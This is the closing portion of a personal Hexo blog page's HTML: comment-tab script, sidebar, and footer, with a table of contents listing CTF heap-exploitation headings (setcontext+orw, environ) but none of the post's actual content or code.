      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81setcontext-orw%EF%BC%88libc-lt-2-29%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">一、setcontext+orw（libc&lt;2.29）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81setcontext"><span class="nav-number">1.1.</span> <span class="nav-text">1、setcontext</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.2.</span> <span class="nav-text">2、解题思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81exp"><span class="nav-number">1.3.</span> <span class="nav-text">3、exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81setcontext-orw%EF%BC%88libc-gt-2-29%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">二、setcontext+orw（libc&gt;2.29）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81%E6%94%B9%E5%8A%A8%E4%BB%A5%E5%8F%8A%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95"><span class="nav-number">2.1.</span> <span class="nav-text">1、改动以及解决方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81exp"><span class="nav-number">2.2.</span> <span class="nav-text">2、exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8environ"><span class="nav-number">3.</span> <span class="nav-text">三、利用environ</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81environ%E5%8F%98%E9%87%8F"><span class="nav-number">3.1.</span> <span class="nav-text">1、environ变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E8%B0%83%E8%AF%95%E5%B0%8Ftips"><span class="nav-number">3.2.</span> <span class="nav-text">2、调试小tips</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81exp-1"><span class="nav-number">3.3.</span> <span class="nav-text">3、exp</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">A2ur2</p>
  <div class="site-description" itemprop="description">在成为大赛pwn题签到员的路上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">A2ur2</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
